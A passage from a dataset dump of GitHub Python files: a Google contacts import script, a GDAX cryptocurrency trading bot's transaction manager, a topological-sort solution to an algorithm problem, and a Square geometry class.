zip(next200, people['responses']):\n\t\t\tperson = data['person']\n\n\t\t\tbirthday = {\n\t\t\t\t'day': None,\n\t\t\t\t'month': None,\n\t\t\t\t'year': None,\n\t\t\t}\n\t\t\tfor birthday_instance in person.get('birthdays',[]):\n\t\t\t\tif 'day' in birthday_instance['date']:\n\t\t\t\t\tbirthday['day'] = birthday_instance['date']['day']\n\t\t\t\tif 'month' in birthday_instance['date']:\n\t\t\t\t\tbirthday['month'] = birthday_instance['date']['month']\n\t\t\t\tif 'year' in birthday_instance['date']:\n\t\t\t\t\tbirthday['year'] = birthday['date']['year']\n\n\t\t\tphotos = {'CONTACT': None, 'PROFILE': None}\n\t\t\tfor photo in person.get('photos',[]):\n\t\t\t\tif 'default' not in photo:\n\t\t\t\t\tphotos[photo['metadata']['source']['type']] = photo['url']\n\t\t\t# Prefer photo I've set, but default to their profile pic otherwise\n\t\t\tphotoUrl = photos['CONTACT'] or photos['PROFILE']\n\n\n\n\t\t\t## Add items to the accounts list in the order of precedence to find matches\n\t\t\taccounts = []\n\t\t\taccounts.append({\n\t\t\t\t\"type\": \"googlecontact\",\n\n\t\t\t\t# Remove the /people/ prefix because Google inconsistently uses different prefixes in different places\n\t\t\t\t# eg /people/ in its API, but /person/ in its UI\n\t\t\t\t\"contactid\": resourceName.replace(\"people/\",\"\"),\n\t\t\t});\n\t\t\tfor num in person.get('phoneNumbers',[]):\n\t\t\t\taccounts.append({\n\t\t\t\t\t\"type\": \"phone\",\n\t\t\t\t\t\"number\": num['canonicalForm'],\n\t\t\t\t})\n\t\t\tfor email in person.get('emailAddresses',[]):\n\t\t\t\taccounts.append({\n\t\t\t\t\t\"type\": \"email\",\n\t\t\t\t\t\"address\": email['value'],\n\t\t\t\t})\n\t\t\tfor name in person.get('names', []):\n\t\t\t\taccounts.append({\n\t\t\t\t\t\"type\": \"name\",\n\t\t\t\t\t\"name\": name['displayName'],\n\t\t\t\t})\n\n\t\t\tdata = {\"identifiers\":accounts, \"date_of_birth\": birthday}\n\n\t\t\tresp = requests.post(LUCOS_CONTACTS+'agents/import', headers=LUCOS_HEADERS, allow_redirects=False, json=data)\n\t\t\tresp.raise_for_status()\n\tupdateScheduleTracker(success=True)\n\nexcept Exception as err:\n\tprint(err)\n\tupdateScheduleTracker(success=False, message=str(err))\n","repo_name":"lucas42/lucos_contacts_googlesync_import","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8177909835","text":"import time\r\nfrom datetime import datetime\r\n\r\nimport threading\r\n\r\nfrom GDAXControler import GDAXControler\r\nfrom UIGraph import UIGraph\r\nimport TradingBotConfig as theConfig\r\nimport Notifier as theNotifier\r\n\r\nclass TransactionManager(object):\r\n\r\n\r\n def __init__(self, GDAXControler, UIGraph, MarketData, Settings):\r\n self.theGDAXControler = GDAXControler\r\n self.theUIGraph = UIGraph\r\n self.theMarketData = MarketData\r\n # Application settings data instance\r\n self.theSettings = Settings\r\n\r\n self.FiatAccountBalance = 0\r\n self.FIATAccountBalanceSimulated = 0\r\n self.initialFiatAccountBalance = 0 # Only necessary in Trading mode. In simulation mode, profit is only theoric\r\n self.initialInvestedFiatAmount = 0\r\n self.CryptoAccountBalance = 0\r\n self.cryptoAccountBalanceSimulated = 0\r\n self.theoricalProfit = 0\r\n self.realProfit = 0\r\n self.percentageProfit = 0\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n self.platformTakerFeeInPercent = float(self.theSettings.SETT_GetSettings()[\"platformTakerFee\"]) * 0.01\r\n self.pendingNotificationToSend = \"\"\r\n\r\n self.buyTimeInTimeStamp = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n\r\n self.theUIGraph.UIGR_updateAccountsBalance(round(self.FiatAccountBalance, 6), round(self.CryptoAccountBalance, 6))\r\n self.theUIGraph.UIGR_updateTotalProfit(self.realProfit, self.theoricalProfit, self.percentageProfit, False)\r\n self.threadOrderPlacingLock = threading.Lock()\r\n self.isOrderPlacingActive = False\r\n self.orderPlacingType = 'NONE'\r\n self.orderPlacingState = 'NONE'\r\n self.orderPlacingMinMaxPrice = 0\r\n self.orderPlacingCurrentPriceInFiat = 0\r\n self.transactionHistory = []\r\n self.isRunning = True\r\n\r\n\r\n def TRNM_InitiateNewTradingSession(self, startSession):\r\n self.theoricalProfit = 0\r\n self.realProfit = 0\r\n self.percentageProfit = 0\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n self.buyTimeInTimeStamp = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n self.pendingNotificationToSend = \"\"\r\n self.isOrderPlacingActive = False\r\n self.orderPlacingType = 'NONE'\r\n self.orderPlacingState = 'NONE'\r\n self.orderPlacingMinMaxPrice = 0\r\n self.orderPlacingCurrentPriceInFiat = 0\r\n\r\n # Refresh platform taker fee\r\n self.platformTakerFeeInPercent = float(self.theSettings.SETT_GetSettings()[\"platformTakerFee\"]) * 0.01\r\n print(\"TRNM - Initiating new trading session. Applied platformTakerFee multiplicator is %s\" % self.platformTakerFeeInPercent)\r\n\r\n # In simulation mode, simulate an amount of money on the account\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == False):\r\n self.initialFiatAccountBalance = 0\r\n self.FIATAccountBalanceSimulated = float(self.theSettings.SETT_GetSettings()[\"simulatedFiatBalance\"])\r\n self.initialInvestedFiatAmount = float(self.theSettings.SETT_GetSettings()[\"investPercentage\"]) * 0.01 * self.FIATAccountBalanceSimulated\r\n self.cryptoAccountBalanceSimulated = 0\r\n self.theUIGraph.UIGR_updateAccountsBalance(self.FIATAccountBalanceSimulated, self.cryptoAccountBalanceSimulated)\r\n self.theUIGraph.UIGR_updateTotalProfit(self.realProfit, self.theoricalProfit, self.percentageProfit, True)\r\n else:\r\n self.initialFiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n print(\"TRNM - Initial fiat balance is %s\" % self.initialFiatAccountBalance)\r\n self.FIATAccountBalanceSimulated = 0\r\n self.cryptoAccountBalanceSimulated = 0\r\n self.initialInvestedFiatAmount = float(self.theSettings.SETT_GetSettings()[\"investPercentage\"]) * 0.01 * self.initialFiatAccountBalance\r\n self.theUIGraph.UIGR_updateTotalProfit(self.realProfit, self.theoricalProfit, self.percentageProfit, False)\r\n self.theGDAXControler.GDAX_RefreshAccountsDisplayOnly()\r\n self.theGDAXControler.GDAX_RequestAccountsBalancesUpdate()\r\n\r\n if (startSession == True):\r\n self.theUIGraph.UIGR_updateInfoText(\"Waiting for next buy opportunity\", False)\r\n\r\n def TRNM_TerminateCurrentTradingSession(self):\r\n print(\"TRNM - Terminating current trading session...\")\r\n\r\n self.FIATAccountBalanceSimulated = 0\r\n self.cryptoAccountBalanceSimulated = 0\r\n self.theUIGraph.UIGR_updateInfoText(\"\", False)\r\n self.pendingNotificationToSend = \"\"\r\n self.isOrderPlacingActive = False\r\n self.isOrderPlacingActive = True\r\n self.orderPlacingCurrentPriceInFiat = 0\r\n self.isOrderPlacingActive = False\r\n self.orderPlacingState = \"NONE\"\r\n\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == False):\r\n pass\r\n else:\r\n # In real trading mode let GDAX controler update the accounts labels. TRNM will manage\r\n # money / refresh itself when initiating the new trading session\r\n self.theGDAXControler.GDAX_CancelOngoingLimitOrder()\r\n\r\n def TRNM_getCryptoBalance(self):\r\n return self.theGDAXControler.GDAX_GetCryptoAccountBalance()\r\n\r\n def TRNM_ForceAccountsUpdate(self):\r\n self.theGDAXControler.GDAX_RequestAccountsBalancesUpdate()\r\n\r\n def TRNM_getBTCBalance(self):\r\n return self.theGDAXControler.GDAX_GetBTCAccountBalance()\r\n\r\n def Place_Market_Order(self, buyOrSell):\r\n if (buyOrSell == \"BUY\"):\r\n print(\"TRNM - Limit %s requested\" % (buyOrSell))\r\n self.theUIGraph.UIGR_updateInfoText(\"Placing %s order\" % (buyOrSell), False)\r\n self.threadOrderPlacingLock.acquire()\r\n self.TRNM_BuyNow()\r\n self.threadOrderPlacingLock.release()\r\n elif (buyOrSell == \"SELL\"):\r\n print(\"TRNM - Limit %s requested\" % (buyOrSell))\r\n self.theUIGraph.UIGR_updateInfoText(\"Placing %s order\" % (buyOrSell), False)\r\n self.threadOrderPlacingLock.acquire()\r\n self.TRNM_SellNow(False)\r\n self.threadOrderPlacingLock.release()\r\n else:\r\n print(\"TRNM - Limit %s requested, unknown order type\" % buyOrSell)\r\n\r\n def computeBuyCapabilityInCrypto(self, includeHeldBalance):\r\n buyCapabilityInCrypto = 0.0\r\n accountBalanceHeld = 0.0\r\n\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n self.FiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n if (includeHeldBalance):\r\n accountBalanceHeld = self.theGDAXControler.GDAX_GetFiatAccountBalanceHeld()\r\n self.FiatAccountBalance += accountBalanceHeld\r\n currentPriceInFiat = self.theGDAXControler.GDAX_GetRealTimePriceInEUR()\r\n buyCapabilityInCrypto = float(self.FiatAccountBalance) / float(currentPriceInFiat)\r\n print(\"TRNM - computeBuyCapabilityInCrypto: capability is %s (current balance is %s + %s (hold))\" % (buyCapabilityInCrypto, self.FiatAccountBalance, accountBalanceHeld))\r\n else:\r\n buyCapabilityInCrypto = self.FIATAccountBalanceSimulated / self.theMarketData.MRKT_GetLastRefPrice()\r\n return buyCapabilityInCrypto\r\n\r\n def computeProfitEstimation(self, isSellFeeApplied, soldAmountInCryptoWithFee):\r\n # Don't include fee to get actual amount of money invested by the user (its cost for user point of view), not the amount of money actually invested in the platform after deducing the fee\r\n InvestmentInFiat = self.currentBuyInitialPriceInEUR * self.currentBuyAmountInCryptoWithoutFee\r\n if (isSellFeeApplied):\r\n SellPriceWithFeeInFiat = (self.averageSellPriceInFiat * soldAmountInCryptoWithFee) * (1-(self.platformTakerFeeInPercent))\r\n else:\r\n SellPriceWithFeeInFiat = (self.averageSellPriceInFiat * soldAmountInCryptoWithFee)\r\n\r\n print(\"TRNM - ComputeProfitEstimation : Buy price with fee: %s\" % InvestmentInFiat)\r\n print(\"TRNM - ComputeProfitEstimation : Sell price with fee: %s, fee applied? %s\" % (SellPriceWithFeeInFiat, isSellFeeApplied))\r\n profitEstimation = (SellPriceWithFeeInFiat - InvestmentInFiat)\r\n return [profitEstimation, SellPriceWithFeeInFiat]\r\n\r\n\r\n def TRNM_BuyNow(self):\r\n if ((self.theGDAXControler.GDAX_IsConnectedAndOperational() == \"True\") or (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == False)):\r\n if (self.currentBuyAmountInCryptoWithoutFee == 0): # Security : no telesopic buys\r\n bOrderIsSuccessful = False\r\n\r\n # Refresh account balances =======================================================================\r\n self.FiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n self.CryptoAccountBalance = self.theGDAXControler.GDAX_GetCryptoAccountBalance()\r\n\r\n # Compute capability ============================================================================\r\n BuyCapabilityInCrypto = self.computeBuyCapabilityInCrypto(False)\r\n print(\"TRNM - Buy Now, capability is: %s Crypto (fiat balance is %s, crypto balance is %s)\" % (BuyCapabilityInCrypto, self.FiatAccountBalance, self.CryptoAccountBalance))\r\n\r\n # Compute and fill Buy data ======================================================================\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n self.currentBuyInitialPriceInEUR = self.theGDAXControler.GDAX_GetRealTimePriceInEUR()\r\n else:\r\n self.currentBuyInitialPriceInEUR = self.theMarketData.MRKT_GetLastRefPrice()\r\n ratioOfCryptoCapabilityToBuy = float(self.theSettings.SETT_GetSettings()[\"investPercentage\"]) * 0.01\r\n self.currentBuyAmountInCryptoWithoutFee = BuyCapabilityInCrypto * ratioOfCryptoCapabilityToBuy\r\n self.currentBuyAmountInCryptoWithFee = BuyCapabilityInCrypto * ratioOfCryptoCapabilityToBuy * (1-(self.platformTakerFeeInPercent))\r\n\r\n # Perform transaction ===========================================================================\r\n print(\"TRNM - Buy Now, amount is: %s Crypto\" % self.currentBuyAmountInCryptoWithoutFee)\r\n bAmountIsAboveMinimumRequested = self.theGDAXControler.GDAX_IsAmountToBuyAboveMinimum(self.currentBuyAmountInCryptoWithoutFee)\r\n print(\"TRNM - Amount to buy is above minimum possible ? %s\" % bAmountIsAboveMinimumRequested)\r\n if (bAmountIsAboveMinimumRequested == True):\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n # Real market: Send the Buy order\r\n bOrderIsSuccessful = self.theGDAXControler.GDAX_SendBuyOrder(self.currentBuyAmountInCryptoWithoutFee)\r\n\r\n\r\n # Update display ============================================================================\r\n self.buyTimeInTimeStamp = time.time()\r\n print(\"TRNM - === BUY %s Crypto at %s Fiat\" % (self.currentBuyAmountInCryptoWithoutFee, self.currentBuyInitialPriceInEUR))\r\n buyTimeStr = datetime.fromtimestamp(int(self.buyTimeInTimeStamp)).strftime('%H:%M')\r\n if (bOrderIsSuccessful == True):\r\n self.performBuyDisplayActions(False)\r\n else:\r\n # Buy transaction failed, cancel\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n if (bAmountIsAboveMinimumRequested == False):\r\n self.theUIGraph.UIGR_updateInfoText(\"%s: Buy order error: amount is too low, increase your %s balance\" % (buyTimeStr, self.theSettings.SETT_GetSettings()[\"strFiatType\"]), True)\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"%s: Buy order error\" % buyTimeStr, True)\r\n\r\n return bOrderIsSuccessful\r\n else:\r\n print(\"TRNM - Trying to buy but there's already a pending buy. Aborted.\")\r\n return False\r\n else:\r\n print(\"TRNM - Trying to buy but GDAX Controler not operational. Aborted.\")\r\n return False\r\n\r\n\r\n def TRNM_SellNow(self, isStopLossSell):\r\n if ((self.theGDAXControler.GDAX_IsConnectedAndOperational() == \"True\") or (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == False)):\r\n if (True):\r\n bOrderIsSuccessful = False\r\n\r\n # Refresh account balances =================================================================================\r\n self.FiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n self.CryptoAccountBalance = self.theGDAXControler.GDAX_GetCryptoAccountBalance()\r\n\r\n print(\"TRNM - Sell Now (fiat balance is %s, crypto balance is %s)\" % (self.FiatAccountBalance, self.CryptoAccountBalance))\r\n\r\n # Send the Sell order ======================================================================================\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n # Subtract quantum so that it compensate up roundings when retrieving balance that could be greater than actual crypto balance and cause an insufficient funds sell error\r\n ratioOfCryptoCapabilityToBuy = float(self.theSettings.SETT_GetSettings()[\"investPercentage\"]) * 0.01\r\n bOrderIsSuccessful = self.theGDAXControler.GDAX_SendSellOrder((self.CryptoAccountBalance - theConfig.CONFIG_CRYPTO_PRICE_QUANTUM) * ratioOfCryptoCapabilityToBuy)\r\n self.averageSellPriceInFiat = self.theGDAXControler.GDAX_GetRealTimePriceInEUR()\r\n else:\r\n self.averageSellPriceInFiat = self.theMarketData.MRKT_GetLastRefPrice()\r\n\r\n # Compute profit estimation ================================================================================\r\n [profitEstimationInFiat, sellPriceWithFeeInFiat] = self.computeProfitEstimation(True, self.currentBuyAmountInCryptoWithFee)\r\n\r\n # If in simulation, simulate the sell amount of money going back to the FIAT account =======================\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == False):\r\n # FIAT balance already present sell value (with GDAX fee) -> money that goes back into fiat\r\n self.FIATAccountBalanceSimulated = self.FIATAccountBalanceSimulated + sellPriceWithFeeInFiat\r\n self.cryptoAccountBalanceSimulated = 0\r\n self.theUIGraph.UIGR_updateAccountsBalance(round(self.FIATAccountBalanceSimulated, 5), round(self.cryptoAccountBalanceSimulated, 5))\r\n bOrderIsSuccessful = True\r\n\r\n # Update display\r\n sellTimeInTimestamp = time.time()\r\n sellTimeStr = datetime.fromtimestamp(int(sellTimeInTimestamp)).strftime('%Hh%M')\r\n\r\n if (bOrderIsSuccessful == True):\r\n self.theoricalProfit = self.theoricalProfit + profitEstimationInFiat\r\n\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n currentMidMarketPrice = self.theGDAXControler.GDAX_GetRealTimePriceInEUR()\r\n else:\r\n currentMidMarketPrice = self.theMarketData.MRKT_GetLastRefPrice()\r\n\r\n print(\"=== SELL %s at %s USD. Profit made : %s\" % (self.currentBuyAmountInCryptoWithFee, currentMidMarketPrice, profitEstimationInFiat))\r\n self.performSellDisplayActions(False, isStopLossSell, currentMidMarketPrice, profitEstimationInFiat)\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n self.buyTimeInTimeStamp = 0\r\n self.TRNM_RefreshAccountBalancesAndProfit()\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"%s: Sell order error\" % sellTimeStr, True)\r\n\r\n return bOrderIsSuccessful\r\n else:\r\n print(\"TRNM - Trying to sell but no more BTC on the account. Aborted\")\r\n return False\r\n else:\r\n print(\"TRNM - Trying to buy but GDAX Controler not operational. Aborted.\")\r\n return False\r\n\r\n def TRNM_ResetBuyData(self):\r\n self.theUIGraph.UIGR_updateInfoText(\"Last Buy has probably been sold manually\", False)\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n\r\n def TRNM_GetCurrentBuyInitialPrice(self):\r\n\r\n self.threadOrderPlacingLock.acquire()\r\n\r\n currentBuyInitialPriceInEUR = self.currentBuyInitialPriceInEUR\r\n\r\n self.threadOrderPlacingLock.release()\r\n\r\n return self.currentBuyInitialPriceInEUR\r\n\r\n def TRNM_RefreshAccountBalancesAndProfit(self):\r\n print(\"TRNM - Refresh Account balances and profit\")\r\n\r\n # Real calculation is only applicable on real market\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n # Sleep before fetching account balance (let time to GDAXControler to retrieve the new balances)\r\n time.sleep(0.5)\r\n self.FiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n # Update real profit only if nothing is spent in BTC\r\n if (self.currentBuyAmountInCryptoWithoutFee < theConfig.CONFIG_CRYPTO_PRICE_QUANTUM):\r\n print(\"TRNM - Nothing spent in Crypto, profit update to %s - initial was %s\" % (self.FiatAccountBalance, self.initialFiatAccountBalance))\r\n self.realProfit = self.FiatAccountBalance - self.initialFiatAccountBalance\r\n self.percentageProfit = ((self.realProfit + self.initialInvestedFiatAmount) / (self.initialInvestedFiatAmount) - 1) * 100\r\n if (self.pendingNotificationToSend != \"\"):\r\n theNotifier.SendWhatsappMessage(self.pendingNotificationToSend + \"\\n*Total profit: %s %%*\" % round(self.percentageProfit, 1) )\r\n else:\r\n print(\"TRNM - RefreshAccountBalancesAndProfit : currentBuyAmountInCryptoWithoutFee greater than quantum: don't update profit. currentBuyAmountInCryptoWithoutFee is %s\" % self.currentBuyAmountInCryptoWithoutFee)\r\n\r\n self.CryptoAccountBalance = self.theGDAXControler.GDAX_GetCryptoAccountBalance()\r\n self.theUIGraph.UIGR_updateTotalProfit(round(self.realProfit, 7), round(self.theoricalProfit, 7), round(self.percentageProfit, 1), False)\r\n else:\r\n self.percentageProfit = ((self.theoricalProfit + self.initialInvestedFiatAmount) / (self.initialInvestedFiatAmount) - 1) * 100\r\n self.theUIGraph.UIGR_updateTotalProfit(0, round(self.theoricalProfit, 7), round(self.percentageProfit, 1), True)\r\n if (self.pendingNotificationToSend != \"\"):\r\n theNotifier.SendWhatsappMessage(self.pendingNotificationToSend + \"\\n*Total profit: %s %%*\" % round(self.percentageProfit, 1) )\r\n\r\n self.pendingNotificationToSend = \"\"\r\n\r\n # /!\\ TODO Check if UIGR calls are thread safe\r\n def performBuyDisplayActions(self, isLimitOrder):\r\n\r\n if (isLimitOrder):\r\n if (self.isOrderPlacingActive == False): # Order is totally filled\r\n sellTriggerInPercent = self.theSettings.SETT_GetSettings()[\"sellTrigger\"]\r\n if (sellTriggerInPercent > 0.0):\r\n sellThreshold = self.currentBuyInitialPriceInEUR * ((sellTriggerInPercent/100)+1)\r\n else:\r\n sellThreshold = self.currentBuyInitialPriceInEUR * (theConfig.CONFIG_MIN_PRICE_ELEVATION_RATIO_TO_SELL + 2*self.platformTakerFeeInPercent) # Not the official one : for display only. Trader class manages this actual feature.\r\n self.theUIGraph.UIGR_updateInfoText(\"%s %s Bought @ %s %s via limit order - Waiting for a sell opportunity above %s %s\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(sellThreshold, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]), False)\r\n theNotifier.SendWhatsappMessage(\"*BUY filled* %s %s @ %s %s via limit order - Waiting for a sell opportunity above %s %s\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(sellThreshold, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]))\r\n\r\n # Order is totally filled, add marker\r\n # self.theUIGraph.UIGR_addMarker(1)\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"%s %s Partially bought @ %s %s. Still ongoing, waiting for next matches\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]), False)\r\n theNotifier.SendWhatsappMessage(\"*BUY match* %s %s @ %s %s. Still ongoing, waiting for next matches\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]))\r\n else:\r\n buyTimeStr = datetime.fromtimestamp(int(self.buyTimeInTimeStamp)).strftime('%H:%M')\r\n sellThreshold = self.currentBuyInitialPriceInEUR * (theConfig.CONFIG_MIN_PRICE_ELEVATION_RATIO_TO_SELL + 2*self.platformTakerFeeInPercent) # Not the official one : for display only. Trader class manages this actual feature.\r\n self.theUIGraph.UIGR_updateInfoText(\"%s - %s %s Bought @ %s %s - Waiting for a sell opportunity above %s %s\" % (buyTimeStr, round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(sellThreshold, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"]), False)\r\n self.theGDAXControler.refreshAccounts()\r\n theNotifier.SendWhatsappMessage(\"*BUY* %s %s @ %s %s - Waiting for a sell opportunity above %s %s\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(sellThreshold, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]))\r\n # self.theUIGraph.UIGR_addMarker(1)\r\n\r\n def performSellDisplayActions(self, isLimitOrder, isStopLossSell, sellPriceInFiat, profitEstimationInFiat):\r\n sellTimeInTimestamp = time.time()\r\n sellTimeStr = datetime.fromtimestamp(int(sellTimeInTimestamp)).strftime('%Hh%M')\r\n\r\n if (isLimitOrder):\r\n if (self.isOrderPlacingActive == False): # Order is totally filled\r\n self.theUIGraph.UIGR_updateInfoText(\"SELL filled at %s, profit was about %s USD. Waiting for next buy opportunity\" % (sellTimeStr, round(profitEstimationInFiat, 5)), False)\r\n self.pendingNotificationToSend = (\"*SELL filled* at %s %s, profit was about *%s USD*. \" % (round(sellPriceInFiat, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(profitEstimationInFiat, 5)))\r\n # Order is totally filled, add marker\r\n # self.theUIGraph.UIGR_addMarker(2)\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"Partial sell at %s, profit was about %s USD. Still ongoing, waiting for next matches\" % (sellTimeStr, round(profitEstimationInFiat, 5)), False)\r\n self.pendingNotificationToSend = (\"*SELL match* at %s %s, profit was about *%s USD*. \" % (round(sellPriceInFiat, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(profitEstimationInFiat, 5)))\r\n else:\r\n if (isStopLossSell == False):\r\n self.theUIGraph.UIGR_updateInfoText(\"Last sell at %s, profit was about %s USD. Waiting for next buy opportunity\" % (sellTimeStr, round(profitEstimationInFiat, 5)), False)\r\n self.pendingNotificationToSend = (\"*SELL* at %s %s, profit was about *%s USD*. \" % (round(sellPriceInFiat, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(profitEstimationInFiat, 5)))\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"StopLoss-sell at %s, loss was about %s USD. Waiting for next buy opportunity\" % (sellTimeStr, round(profitEstimationInFiat, 5)), True)\r\n self.pendingNotificationToSend = (\"*STOPLOSS-SELL* at %s %s, loss was about *%s USD*. \" % (round(sellPriceInFiat, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(profitEstimationInFiat, 5)))\r\n # Add marker\r\n # self.theUIGraph.UIGR_addMarker(2)","repo_name":"MufengW/ECE496","sub_path":"Astibot/TransactionManager.py","file_name":"TransactionManager.py","file_ext":"py","file_size_in_byte":26072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23506463089","text":"import sys\ninput = sys.stdin.readline\n\nfrom collections import deque\n\nT = int(input())\n\n\nfor _ in range(T):\n N, K = map(int, input().split())\n\n time = list(map(int, input().split()))\n time.insert(0, 0)\n\n dp = [0] * (N+1)\n\n connection = [[] for _ in range(N+1)]\n #먼저 건설해야하는 빌딩 수 저장\n seq = [0] * (N+1)\n\n for _ in range(K):\n x, y = map(int, input().split())\n #x를 지으면 y를 지을 수 있음\n connection[x].append(y)\n #y를 지으려면 seq[y]개의 건물을 지어야함\n seq[y] += 1\n\n dq = deque()\n\n #지금 지을 수 있는 건물\n for i in range(1, N+1):\n if seq[i] == 0:\n dq.append(i)\n\n while dq:\n x = dq.popleft()\n #x를 지으면 지을 수 있는 건물\n for y in connection[x]:\n #x를 지었으므로 지어야 하는 건물 -1\n seq[y] -= 1\n # 건물 시간 최대로\n dp[y] = max(dp[x] + time[x], dp[y])\n if seq[y] == 0:\n dq.append(y)\n \n\n W = int(input())\n print(dp[W] + time[W])\n","repo_name":"nkrang/Algorithm-Study","sub_path":"202111/B-1005/ACM_craft.py","file_name":"ACM_craft.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22365257570","text":"#!/usr/bin/python3\n\"\"\" This module defines the Square class \"\"\"\nfrom .rectangle import Rectangle\n\n\nclass Square(Rectangle):\n \"\"\" Represents the square shape \"\"\"\n def __init__(self, size, x=0, y=0, id=None):\n \"\"\"\n Initialize an instance of a square\n\n Parameters\n size : integer\n The size (width and height) for the square\n x : integer, optional\n The x axis for displaying the square\n y : integer, optional\n The y axis for displaying the square\n \"\"\"\n super().__init__(id=id, x=x, y=y, width=size, height=size)\n\n def __str__(self):\n \"\"\"\n Returns the string representation of the square.\n \"\"\"\n return (\"[Square] ({}) {}/{} - {}\".format(self.id, self.x,\n self.y, self.width, self.height))\n\n @property\n def size(self):\n \"\"\" Return the size for the square \"\"\"\n return (self.width)\n\n @size.setter\n def size(self, value):\n \"\"\"\n Set the size for the square\n\n Parameters\n value : integer\n The size for the square\n \"\"\"\n self.width = value\n self.height = value\n\n def update(self, *args, **kwargs):\n \"\"\"\n Update the square attributes\n\n Parameters\n args : tuple\n Values for square attributes as positional\n arguments.\n kwargs : dictionary\n Values for square attributes as named\n arguments.\n \"\"\"\n if (len(args) > 0 and type(args[0]) is int):\n if (len(args) == 1):\n self.id, = args\n elif (len(args) == 2):\n self.id, self.size = args\n elif (len(args) == 3):\n self.id, self.size, self.x = args\n else:\n self.id, self.size, self.x, self.y = args\n else:\n self.id = kwargs.get(\"id\") if kwargs.get(\"id\") is not None \\\n else self.id\n self.size = kwargs.get(\"size\") if kwargs.get(\"size\") is \\\n not None else self.size\n self.x = kwargs.get(\"x\") if kwargs.get(\"x\") is not None \\\n else self.x\n self.y = kwargs.get(\"y\") if kwargs.get(\"y\") is not None \\\n else self.y\n\n def to_dictionary(self):\n \"\"\"\n Returns dictionary representation for instance\n of a square.\n \"\"\"\n return {\n \"x\": self.x,\n \"y\": self.y,\n \"id\": self.id,\n \"size\": self.width\n 